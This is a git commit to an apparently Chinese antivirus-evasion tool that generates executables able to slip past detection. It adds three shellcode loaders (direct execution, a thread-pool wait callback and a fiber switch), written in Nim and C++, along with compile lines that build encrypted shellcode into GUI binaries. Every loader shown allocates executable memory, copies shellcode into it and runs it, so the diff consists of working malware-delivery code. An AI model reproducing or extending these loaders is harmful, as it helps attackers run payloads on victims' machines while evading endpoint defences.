增加shellcode加载方式

mysa · mysa · commit 323eabdee597 · 2021-01-23T22:49:24.000+08:00
增加了shellcode加载方式，分别为Direct Load、CreateThreatPoolWait、Fiber Load
diff --git a/Compiler.ini b/Compiler.ini
@@ -2,4 +2,7 @@
 OEP Hiijack-Inject Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --passL:-lntdll --opt:size -o:.\bin\ -f OEP_Hiijack_Inject_Load.nim
 Thread Hiijack-Inject Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Thread_Hiijack_Inject_Load.nim
 APC-Ijnect Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f APC_Ijnect_Load.nim
-Early Bird APC-Injetc Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Early_Bird_APC_Injetc_Load.nim
+Early Bird APC-Injetc Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Early_Bird_APC_Injetc_Load.nim
+Direct Load=nim cpp -d:<encrypt> --passL:-static -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Direct_Load.nim
+CreateThreatPoolWait Load=nim c -d:<encrypt> -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Thread_Pool_Wait.nim
+Fiber Load=nim c -d:<encrypt> -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f Fiber_Load.nim
diff --git a/Direct_Load.nim b/Direct_Load.nim
@@ -0,0 +1,6 @@
+import public
+
+{.compile: "module\\Direct_Load.cpp".}
+proc Direct_LoadNim(plainBuffer:cstring,size:cint):cint {.importcpp:"Direct_Load(@)",header:"module\\public.hpp".}
+
+discard Direct_LoadNim(code,codelen)
diff --git a/Fiber_Load.nim b/Fiber_Load.nim
@@ -0,0 +1,13 @@
+import winim/lean
+import public
+
+proc fiberload(shellcode:cstring,shellcodelen:cint): void =
+    let rPtr = VirtualAlloc(NULL,cast[SIZE_T](shellcode.len),MEM_COMMIT,PAGE_EXECUTE_READ_WRITE)
+    copyMem(rPtr,shellcode,shellcodelen)
+    discard ConvertThreadToFiber(NULL)
+    let shellcodeFiber = CreateFiber(cast[SIZE_T](shellcodelen),cast[LPFIBER_START_ROUTINE](rPtr),NULL)
+    SwitchToFiber(shellcodeFiber)
+    DeleteFiber(shellcodeFiber)
+
+when isMainModule:
+    fiberload(code,codelen)
diff --git a/README.md b/README.md
@@ -2,6 +2,10 @@
 快速生成免杀可执行文件
 
 ![codeloader](pic/codeloader.png)
+## 更新：
+
+**20210123：增加三种加载`shellcode`方式，其中两种使用了[winim](https://github.com/khchen/winim)库，需要安装该库才能正常编译**
+
 ## 特点：
 
 1：自带四种加载方式
@@ -59,6 +63,10 @@
 
 ![config](pic/config.png)
 
+## 更新：
+
+**20210123：增加三种加载`shellcode`方式，其中两种使用了[winim](https://github.com/khchen/winim)库，需要安装该库才能正常编译**
+
 ## 引用：
 
 都是网上公开的方法
diff --git a/Thread_Pool_Wait.nim b/Thread_Pool_Wait.nim
@@ -0,0 +1,13 @@
+import winim/lean
+import public
+
+proc threadpool(shellcode:cstring,shellcodelen:cint): void =
+    let rPtr = VirtualAlloc(NULL,cast[SIZE_T](shellcode.len),MEM_COMMIT,PAGE_EXECUTE_READ_WRITE)
+    copyMem(rPtr,shellcode,shellcodelen)
+    let event = CreateEvent(NULL,FALSE,TRUE,NULL)
+    let threadPoolWait = CreateThreadpoolWait(cast[PTP_WAIT_CALLBACK](rPtr),NULL,NULL)
+    SetThreadpoolWait(threadPoolWait,event,NULL)
+    WaitForSingleObject(event,INFINITE)
+
+when isMainModule:
+    threadpool(code,codelen)
diff --git a/module/Direct_Load.cpp b/module/Direct_Load.cpp
@@ -0,0 +1,9 @@
+#include "public.hpp"
+
+int Direct_Load(char *shellcode,SIZE_T shellcodeSize)
+{
+    LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+	memcpy(Memory, shellcode, shellcodeSize);
+	((void(*)())Memory)();
+	return 0;
+}
diff --git a/module/public.hpp b/module/public.hpp
@@ -4,4 +4,5 @@
 int APC(char *buf,SIZE_T shellSize);
 int Early(char *shellcode,SIZE_T shellcodeSize);
 int OEP(char *shellcode,SIZE_T shellcodeSize);
-int Thread(char *shellcode,SIZE_T shellcodeSize);
+int Thread(char *shellcode,SIZE_T shellcodeSize);
+int Direct_Load(char *shellcode,SIZE_T shellcodeSize);
